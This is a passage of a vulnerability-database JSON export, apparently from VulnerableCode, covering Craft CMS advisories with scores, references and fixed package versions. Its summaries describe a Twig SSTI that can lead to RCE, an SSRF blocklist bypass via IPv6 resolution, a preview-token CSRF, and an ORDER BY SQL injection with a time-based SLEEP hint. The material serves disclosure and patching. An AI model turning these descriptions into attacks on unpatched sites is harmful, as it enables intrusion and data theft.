:M/B:A/M:M/D:T/2026-04-22T14:18:44Z/"}],"url":"https://github.com/craftcms/cms/commit/ebe7e85f1c89700d64332f72492be2e9a594e783"},{"reference_url":"https://
github.com/craftcms/cms/security/advisories/GHSA-95wr-3f2v-v2wh","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-22T14:18:44Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-95wr-3f2v-v2wh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41130","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41130"},{"reference_url":"https://github.com/advisories/GHSA-95wr-3f2v-v2wh","reference_id":"GHSA-95wr-3f2v-v2wh","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-95wr-3f2v-v2wh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110278?format=json","purl":"pkg:composer/craftcms/cms@5.9.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-asek-4gme-gug8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.15"}],"aliases":["CVE-2026-41130","GHSA-95wr-3f2v-v2wh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gzry-xtu5-ukhu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57972?format=json","vulnerability_id":"VCID-h6t5-pdp5-8qhe","summary":"Craft CMS Potential Remote Code Execution via Twig SSTI\nNote that users must have administrator access to the Craft Control Panel, and 
[allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled for this to work, which is against Craft CMS' recommendations for any non-dev environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nNote: This is a follow-up to [GHSA-f3cw-hg6r-chfv](https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv)\n\nUsers should update to the patched versions (4.16.6 and 5.8.7) to mitigate the issue.\n\nResources: https://github.com/craftcms/cms/pull/17612","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-57811","reference_id":"","reference_type":"","scores":[{"value":"0.00227","scoring_system":"epss","scoring_elements":"0.45595","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-57811"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e77f8a287dcdda41f1724f525d03542f18566cbc","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-25T18:05:02Z/"}],"url":"https://github.com/craftcms/cms/commit/e77f8a287dcdda41f1724f525d03542f18566cbc"},{"reference_url":"https://github.com/craftcms/cms/pull/17612","r
eference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-25T18:05:02Z/"}],"url":"https://github.com/craftcms/cms/pull/17612"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57811","reference_id":"CVE-2025-57811","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57811"},{"reference_url":"https://github.com/advisories/GHSA-crcq-738g-pqvc","reference_id":"GHSA-crcq-738g-pqvc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-crcq-738g-pqvc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-crcq-738g-pqvc","reference_id":"GHSA-crcq-738g-pqvc","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-25T18:05:02Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-crcq-738g-pqvc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv","reference_id":"GHSA-f3cw-hg6r-chfv","reference_type":"",
"scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74412?format=json","purl":"pkg:composer/craftcms/cms@5.8.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1
kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.7"}],"aliases":["CVE-2025-57811","GHSA-crcq-738g-pqvc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h6t5-pdp5-8qhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50333?format=json","vulnerability_id":"VCID-hkp9-3hzv-quhk","summary":"Craft CMS: Cloud Metadata SSRF Protection Bypass via IPv6 Resolution\nThe SSRF validation in Craft CMS’s GraphQL Asset mutation uses `gethostbyname()`, which only resolves IPv4 addresses. 
When a hostname has only AAAA (IPv6) records, the function returns the hostname string itself, causing the blocklist comparison to always fail and completely bypassing SSRF protection.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27129","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01541","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27129"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-28T02:16:52Z/"}],"url":"https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27129","reference_id":"CVE-2026-27129","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"ge
neric_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27129"},{"reference_url":"https://github.com/advisories/GHSA-v2gc-rm6g-wrw9","reference_id":"GHSA-v2gc-rm6g-wrw9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v2gc-rm6g-wrw9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-v2gc-rm6g-wrw9","reference_id":"GHSA-v2gc-rm6g-wrw9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-28T02:16:52Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-v2gc-rm6g-wrw9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-28T02:16:52Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affe
cted_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27129","GHSA-v2gc-rm6g-wrw9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hkp9-3hzv-quhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50790?format=json","vulnerability_id":"VCID-hyct-5gap-7kdu","summary":"Craft CMS has a potential information disclosure vulnerability in preview tokens\nCraft CMS has a CSRF issue in the preview token endpoint at `/actions/preview/create-token`.  
The endpoint accepts an attacker-supplied `previewToken`.\n\nBecause the action does not require POST and does not enforce a CSRF token, an attacker can force a logged-in victim editor to mint a preview token chosen by the attacker.\n\nThat token can then be used by the attacker (without authentication) to access previewed/unpublished content tied to the victim’s authorized preview scope.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29113","reference_id":"","reference_type":"","scores":[{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00694","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29113"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/6a88468dc35a27cccc8fef254f415a447d4a07cc","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T20:05:03Z/"}],"url":"https://github.com/craftcms/cms/commit/6a88468dc35a27cccc8fef254f415a447d4a07cc"},{"reference_url":"https://nvd.nist.gov/vuln/d
etail/CVE-2026-29113","reference_id":"CVE-2026-29113","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29113"},{"reference_url":"https://github.com/advisories/GHSA-vg3j-hpm9-8v5v","reference_id":"GHSA-vg3j-hpm9-8v5v","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vg3j-hpm9-8v5v"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-vg3j-hpm9-8v5v","reference_id":"GHSA-vg3j-hpm9-8v5v","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T20:05:03Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-vg3j-hpm9-8v5v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74587?format=json","purl":"pkg:composer/craftcms/cms@5.9.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tb
hq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.7"}],"aliases":["CVE-2026-29113","GHSA-vg3j-hpm9-8v5v"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hyct-5gap-7kdu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50071?format=json","vulnerability_id":"VCID-jeyh-3jxd-z3g6","summary":"Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`\nThe `element-indexes/get-elements` endpoint is vulnerable to **SQL Injection** via the `criteria[orderBy]` parameter (JSON body). The application fails to sanitize this input before using it in the database query.\nAn attacker with **Control Panel access** can inject arbitrary SQL into the `ORDER BY` clause by omitting `viewState[order]` (or setting both to the same payload).\n\n> [!NOTE]\n> The `ORDER BY` clause executes per row. 
`SLEEP(1)` on 10 rows = 10s delay.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25495","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03183","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25495"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/96c60d775c644ff0a0276da52fe29e11d4cd38d2","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:10Z/"}],"url":"https://github.com/craftcms/cms/commit/96c60d775c644ff0a0276da52fe29e11d4cd38d2"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","s
coring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:10Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25495","reference_id":"CVE-2026-25495","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25495"},{"reference_url":"https://github.com/advisories/GHSA-2453-mppf-46cj","reference_id":"GHSA-2453-mppf-46cj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2453-mppf-46cj"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj","reference_id":"GHSA-2453-mppf-46cj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:10Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5c
mc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"